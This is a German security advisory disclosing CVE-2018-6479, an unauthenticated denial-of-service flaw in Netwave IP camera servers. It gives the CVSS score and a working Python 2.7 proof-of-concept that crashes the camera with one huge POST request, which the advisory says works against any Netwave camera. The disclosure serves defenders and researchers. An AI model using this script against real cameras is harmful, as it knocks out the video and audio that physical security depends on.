
[CVE-2018-6479] Der Netwave-IP-Kamera-Server ist durch eine einzige riesige POST-Anfrage verwundbar gegenüber Denial of Service.
| CVE | Beschreibung |
|---|---|
| CVE-2018-6479 | Nicht authentifizierte Remote-Denial-of-Service-Schwachstelle |
| CVSS | Wert | Details |
|---|---|---|
| 3 | 7.3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X |
Während einer IoT-Sicherheitsforschung wurden einige Schwachstellen bei verschiedenen IP-Kamera-Herstellern entdeckt. Die Netwave-IP-Kamera ist ein IP-Kamera-Server, der es ermöglicht, das Kameravideo zu sehen und die Kamera zu verwalten. IP-Kameras werden insbesondere für physische Sicherheits- und Kontrollzwecke eingesetzt, daher ist ihre Verfügbarkeit entscheidend.
Jede Netwave-IP-Kamera kann allein durch das Senden einer riesigen POST-Anfrage an ihren Stammpfad außer Betrieb genommen werden. Sobald die Anfrage gesendet wird, bleibt das Gerät hängen und stoppt das Streaming von Audio und Video.
Proof of Concept: Führen Sie das folgende Python-2.7-Skript gegen eine beliebige NetWave-IP-Kamera aus; sie wird sofort aufhören zu antworten und Video/Audio zu streamen.
import string
import httplib
import urllib2
host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body
headers = {
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}
url = "/"
conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data
Gonzalo García León